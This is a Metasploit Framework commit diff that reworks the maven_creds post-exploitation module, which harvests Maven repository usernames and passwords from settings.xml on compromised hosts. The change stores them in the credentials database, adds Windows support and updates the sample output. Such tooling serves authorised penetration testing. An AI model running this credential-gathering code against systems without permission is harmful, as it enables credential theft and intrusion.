Transform loots into creds

2017-08-22 11:57:51 +02:00 · 2017-08-22 11:57:51 +02:00 · be2739d335
parent cde319a5ec
commit be2739d335
2 changed files with 21 additions and 12 deletions
--- a/documentation/modules/post/multi/gather/maven_creds.md
+++ b/documentation/modules/post/multi/gather/maven_creds.md
@ -32,14 +32,12 @@ msf post(maven_creds) > run
 [*]     Id: server-nexus
 [*]     Username: deploynexus
 [*]     Password: password
-[+] Saved credentials to /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt

-msf post(maven_creds) > loot
+msf post(maven_creds) > creds

-Loot
-====
-
-host       service  type                name          content     info                                                                           path
----       -------  ----                ----          -------     ----                                                                           ----
-127.0.0.1           maven.credentials   settings.xml  text/plain  Maven credentials from /home/user/settings.xml and id server-nexus             /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
+Credentials
+===========

+host  origin  service  public          private     realm           private_type
+----  ------  -------  ------          -------     -----           ------------
+                       deploynexus     password    server-nexus    Password
--- a/modules/post/multi/gather/maven_creds.rb
+++ b/modules/post/multi/gather/maven_creds.rb
@ -19,7 +19,7 @@ class MetasploitModule < Msf::Post
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['elenoir'],
-      'Platform'       => %w{ bsd linux osx unix },
+      'Platform'       => %w{ bsd linux osx unix win },
      'SessionTypes'   => ['shell','meterpreter']
    ))
  end
@ -93,10 +93,21 @@ class MetasploitModule < Msf::Post
      print_status("    Id: %s" % id)
      print_status("    Username: %s" % username)
      print_status("    Password: %s" % password)
-      loot_path = store_loot("maven.credentials", "text/plain", session, "#{username} #{password}",
-          "settings.xml", "Maven credentials from #{target} and id #{id}")
-      print_good("Saved credentials to #{loot_path}")
      print_line("")
+
+      credential_data = {
+          origin_type: :import,
+          module_fullname: self.fullname,
+          filename: target,
+          service_name: 'maven',
+          realm_value: id,
+          realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+          private_type: :password,
+          private_data: password,
+          username: username,
+          workspace_id: myworkspace_id
+      }
+      create_credential(credential_data)
    end
  end